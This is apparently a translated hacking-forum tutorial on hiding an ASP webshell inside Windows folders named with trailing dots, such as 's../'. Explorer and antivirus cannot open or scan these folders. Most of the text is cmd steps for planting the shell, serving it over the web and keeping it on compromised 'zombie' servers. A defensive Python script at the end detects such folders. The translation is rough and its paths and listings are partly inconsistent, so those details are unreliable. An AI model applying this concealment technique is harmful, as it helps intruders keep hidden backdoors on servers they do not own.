How can I prevent ASP trojans from being killed?

Source: Internet
Author: User
Normally you have to modify or encrypt the code of an ASP trojan to keep antivirus software from killing it. With the method below you do not need to modify it, and in any case no one can guarantee that your modified ASP will not be killed by XX antivirus software.

Anyway, I am lazy too, so we just run cmd and cd to C:/winnt/system32/myhome, that is, the directory your virtual directory is redirected to. Let's talk about the principle first. Everybody knows that in Windows the "/" symbol is the path separator. For example, "C:/Windows/" means the Windows folder in partition C, and "C:/Windows/system.exe" refers to the system.exe file in the Windows folder in partition C. Let's continue with an assumption:

What if the file name contains the "/" symbol? Assume that "S/" is the name of a folder located in "F:/", so that its path is "F:/S/". When we access it, Windows will mistakenly think that we want to open the S folder of partition F, so it will not be able to open it and will return an error, because that path does not exist.

Maybe you try to create an "S/" file, but Windows tells you that the "/" symbol cannot be used in the name of a file or folder. It seems that Windows thought of this long ago. OK, but do not believe that you cannot create a file containing the "/" symbol.

Now turn on your computer and let's make some interesting attempts. In Windows, click Start > Run, type "cmd" and press Enter (on Win98, type "command"). You will see the Windows command console, which we will use for the remaining tests. In the commands below, the text in {} is my notes:
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:/winnt/system32/myhome> mkdir S/ {our first attempt; Windows creates only the S folder and ignores the "/"}
C:/winnt/system32/myhome> mkdir S/S1/ {still failed; Windows first creates the S folder and then creates the S1 folder inside S}
C:/winnt/system32/myhome> mkdir S./ {"S./" is resolved to S; the "./" is ignored again}
The subdirectory or file S./ already exists.
C:/winnt/system32/myhome> mkdir s../ {finally succeeded; you can now see "S." in Windows Explorer, but it cannot be opened or deleted}
C:/winnt/system32/myhome> mkdir s.../ {succeeded again; in Windows Explorer you can see "S..", which can be opened but cannot be deleted}

Why? The "S." folder you see can be neither opened nor deleted. It cannot be opened because its actual path is "C:/winnt/system32/myhome/s../" (we know the actual path because we created it), while Windows Explorer shows its name as "S.". That is to say, when you try to open it, Windows actually tries to open "C:/winnt/system32/myhome/S./", which of course cannot be opened because it does not exist, so Windows reports an error. It cannot be deleted for the same reason: Windows incorrectly parses a path that actually exists as a path that does not exist, so the XX operation is not performed.

The folder "S.." can be opened but cannot be deleted. Wait... opened? Did you think Windows really opened the "s.../" folder we created? You will understand after the experiment below. As before, the text in {} is my comment to help you understand:
----------------------------------------------

Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:/winnt/system32/myhome> copy net.asp s../ {copy your ASP trojan file to "s../", which Windows Explorer shows as "S."}
1 file has been copied.
C:/winnt/system32/myhome>

Now go back to Windows Explorer and open the "S." folder. What do you see? Why is the "net.asp" file here? Didn't we just copy it to "S."? We opened the "S." folder, but did that actually open "S"? That's true. In fact, if you create another "S" folder, "S." can be opened, but what actually opens is "S".

This is the key point. We use the "S." directory to hide our trojan, regardless of whether the trojan is a virus. Generally an EXE file cannot be used in "S.", but an ASP trojan is fine! You can run the CMD command, copy net.asp to the "S." directory, delete net.asp, and then browse to http://127.0.0.1/kiss/s../net.asp. You can see that the ASP trojan is served. Users generally cannot find it, and even professional antivirus software only kills "S" and skips "s../". So let's talk about the deletion method.
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

F:/test> dir
The volume in drive F is bgting
The serial number of the volume is 2c8e-fe1c.

F:/test directory

<Dir> .
<Dir> ..
<Dir> S.
<Dir> S..
9 bytes for one file
3,390,029,824 bytes available for five Directories

C:/winnt/system32/myhome> rmdir s../
The directory is not empty.
C:/winnt/system32/myhome> rmdir s../ /s
s../, are you sure you want to confirm (y/n)? Y
C:/winnt/system32/myhome> rmdir s.../ /s
s.../, are you sure you want to confirm (y/n)? Y

You don't have to worry about cracking your zombie. Well, this way a hidden backdoor is built that won't be killed. All of the above was tested successfully on a zombie over 3389.
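The folder-name behaviour described above also gives a defender something concrete to look for. The following sweep is an added example, not part of the original article: it walks a web root through the `\\?\` prefix on Windows, which makes the file APIs take names verbatim, and reports every directory whose name ends in a dot or a space together with the script files inside it. `SCRIPT_EXTS`, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import shutil
import tempfile

# Assumption: script extensions worth flagging on an IIS/ASP site.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".aspx"}


def normalized_away(name):
    """True if Win32 path normalization strips trailing dots/spaces."""
    return name not in (".", "..") and name != name.rstrip(". ")


def extended(path):
    r"""On Windows, prefix \\?\ so file APIs take names verbatim (local drives)."""
    path = os.path.abspath(path)
    if os.name == "nt" and not path.startswith("\\\\?\\"):
        path = "\\\\?\\" + path
    return path


def find_hidden_dirs(web_root):
    """Return [(dir, [scripts inside])] for dirs named with a trailing dot/space."""
    findings, stack = [], [extended(web_root)]
    while stack:
        current = stack.pop()
        try:
            with os.scandir(current) as it:
                entries = list(it)
        except OSError:
            continue  # unreadable directory: skip it, keep sweeping
        if normalized_away(os.path.basename(current)):
            findings.append((current, sorted(
                e.name for e in entries if e.is_file(follow_symlinks=False)
                and os.path.splitext(e.name)[1].lower() in SCRIPT_EXTS)))
        stack.extend(e.path for e in entries if e.is_dir(follow_symlinks=False))
    return findings


def make_sample(root):
    """Constructed sample tree: a normal 's' folder and an 's..' folder."""
    for folder, name in (("s", "index.asp"), ("s..", "net.asp")):
        os.mkdir(os.path.join(extended(root), folder))
        open(os.path.join(extended(root), folder, name), "w").close()


if __name__ == "__main__":
    tmp = tempfile.mkdtemp()
    make_sample(tmp)
    print(find_hidden_dirs(tmp))
    shutil.rmtree(extended(tmp))
```

Any hit under a web root deserves manual review, since ordinary tooling does not create such names; the same `\\?\` form of the path is what lets an administrator open or remove the folder.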
